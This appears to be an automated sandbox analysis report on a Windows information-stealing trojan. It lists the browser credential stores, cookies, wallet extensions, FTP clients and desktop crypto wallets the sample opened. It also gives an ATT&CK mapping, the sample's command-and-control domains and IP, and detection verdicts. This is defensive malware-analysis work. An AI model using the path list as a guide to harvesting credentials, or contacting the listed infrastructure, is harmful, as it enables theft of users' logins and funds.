Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: Yara match, File source: 00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match, File source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (techniques listed per tactic; a leading number is the count of signatures mapped to that technique in this report)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: 12 Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: 1 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: 21 Virtualization/Sandbox Evasion, 1 Process Injection, 2 Obfuscated Files or Information, 22 Software Packing, 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: 221 Security Software Discovery, 21 Virtualization/Sandbox Evasion, 1 Process Discovery, 22 System Information Discovery, Internet Connection Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: 1 Archive Collected Data, 4 Data from Local System, Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: 11 Encrypted Channel, 2 Non-Application Layer Protocol, 13 Application Layer Protocol, Protocol Impersonation, Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
Behavior Graph ID: 1599847
Sample: 4JPKDcwtDo.exe
Start date: 26/01/2025
Architecture: WINDOWS
Score: 100
DNS/IP: financialfreez.click, toppyneedus.biz, impolitewearr.biz
Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
Process started: 4JPKDcwtDo.exe
  DNS/IP: toppyneedus.biz 172.67.149.66, 443, 49700, 49701 CLOUDFLARENETUS United States
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 5 other signatures
  Process started: WerFault.exe 21 16
    File dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode

Source | Detection | Scanner | Label
4JPKDcwtDo.exe | 61% | ReversingLabs | Win32.Trojan.GenSHCode
4JPKDcwtDo.exe | 57% | Virustotal |
4JPKDcwtDo.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://toppyneedus.biz/apip | 100% | Avira URL Cloud | malware
https://toppyneedus.biz/_ | 100% | Avira URL Cloud | malware
https://toppyneedus.biz/api$ | 100% | Avira URL Cloud | malware
https://toppyneedus.biz/riq | 100% | Avira URL Cloud | malware
https://toppyneedus.biz/9 | 100% | Avira URL Cloud | malware
https://toppyneedus.biz/h | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
toppyneedus.biz | 172.67.149.66 | true | false | | high
impolitewearr.biz | unknown | unknown | false | | high
financialfreez.click | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://toppyneedus.biz/api | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz:443/api | 4JPKDcwtDo.exe, 00000004.00000003.1320515584.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz/_ | 4JPKDcwtDo.exe, 00000004.00000003.1352355984.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarke | 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.11.dr | false | | high
https://toppyneedus.biz/api$ | 4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | false | | high
